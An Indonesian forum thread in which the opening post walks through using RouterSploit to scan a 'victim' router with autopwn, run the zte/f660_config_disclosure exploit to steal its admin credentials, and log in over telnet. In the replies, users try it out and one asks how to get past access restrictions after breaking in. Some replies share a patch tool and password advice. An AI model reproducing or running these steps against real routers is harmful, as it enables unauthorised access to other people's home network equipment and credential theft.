[Share] Exploit Router with RouterSploit
#1
Assalamuallaikum
Kali ini saya mau share tools untuk eksploitasi pada router, tidak semua router bisa di eksploitasi dengan RouterSploit, hanya yang vulnerable saja pada module
yang sudah di sediakan.

Untuk instalasi pada OSX & Ubuntu bisa dilihat di sini https://github.com/reverse-shell/routers...buntu-1604

Installation
Code:
git clone https://github.com/reverse-shell/routersploit

Nah disini saya sudah mendapatkan victim, jangan lupa scan dulu dengan module autopwn, untuk mengecek apakah router vulnerable dengan module yang disediakan oleh RouterSploit.
Spoiler! :
[Image: eiusx.png]

Usage
Code:
python rsf.py
use scanners/autopwn
set target "ip victim"
Spoiler! :
[Image: pjIFw.png]

kemudian jalankan module
Code:
run
Spoiler! :
[Image: rZ1ea.png]

Ternyata router vulnerable, langsung saja kita exploit router dengan module yang direkomendasikan RouterSploit. Disini saya gunakan module zte/f660_config_disclosure

Code:
use exploits/zte/f660_config_disclosure
set target "ip victim"
run
Spoiler! :
[Image: mKAtx.png]

wow, exploit berhasil, saya mendapatkan username dan password router, mari coba kita login ke telnet server pada modem router Smile
Code:
telnet "ip victim"
Spoiler! :
[Image: bnpYF.png]

wew, login sukses vroh
ow iya, untuk update toolsnya juga simple kok

Update
Code:
cd routersploit
git pull

Demikianlah mengenai tools RouterSploit
Terimakasih dan semoga bermanfaat Smile

source :
Patching ZTE F6XX Router
Nih buat yang mau ngamanin routernya, tools buatan om @devilscream_
codename@tong:~# Try Harder!

#2
Izin coba exploitnya tong,, hahahaha

#3
(05-26-2016, 09:47 PM)Abdul Khaliq Wrote: Izin coba exploitnya tong,, hahahaha

monggo om, ijo ijo seikhlasnya om Smile
codename@tong:~# Try Harder!

#4
thanks you abg otong :v
ane test juga

#5
ane udah masuk ke telnet nya nih bang,
tapi ane coba bikin file disitu ternyata Access denied
solusinya biar enggak access denied gimana ya bang?

#6
MANTAPP

#7
Nice Tong Big Grin

keep sharing tong

#8
ZTE F6XX (modem indihome,dkk) rata2 vuln ama exploit ini.

ini buat yang mau amanin / patching routernya
https://github.com/devilscream/zte-patch

tutorialnya udah ada Smile simple kok

#9
(05-27-2016, 08:54 AM)ugly_clown Wrote: ane udah masuk ke telnet nya nih bang,
tapi ane coba bikin file disitu ternyata Access denied
solusinya biar enggak access denied gimana ya bang?

pnyebab access denied bisa jadi situ cuma login sbagai guest (tamu), yg hanya bisa melhat, tanpa bisa merubah
solusinya harus bisa dpetin hak aksesnya om, atau bisa baca disini tentang permissions https://en.wikipedia.org/wiki/File_system_permissions

(05-28-2016, 12:24 AM)devilscream_ Wrote: ZTE F6XX (modem indihome,dkk) rata2 vuln ama exploit ini.

ini buat yang mau amanin / patching routernya
https://github.com/devilscream/zte-patch

tutorialnya udah ada Smile simple kok

sbernya buat amanin routernya ckup gnti user am pass ke yg lbih strong, cntohnya sperti penambahan karakter simbol, dan angka
btw toolsnya kren om, ane tambahin ke thread ye Big Grin
codename@tong:~# Try Harder!

#10
ane stuck di sini om
ImportError: No module named cryptography.hazmat.backends
Spoiler! :
[Image: 33y2ycp.png]






Users browsing this thread: 1 Guest(s)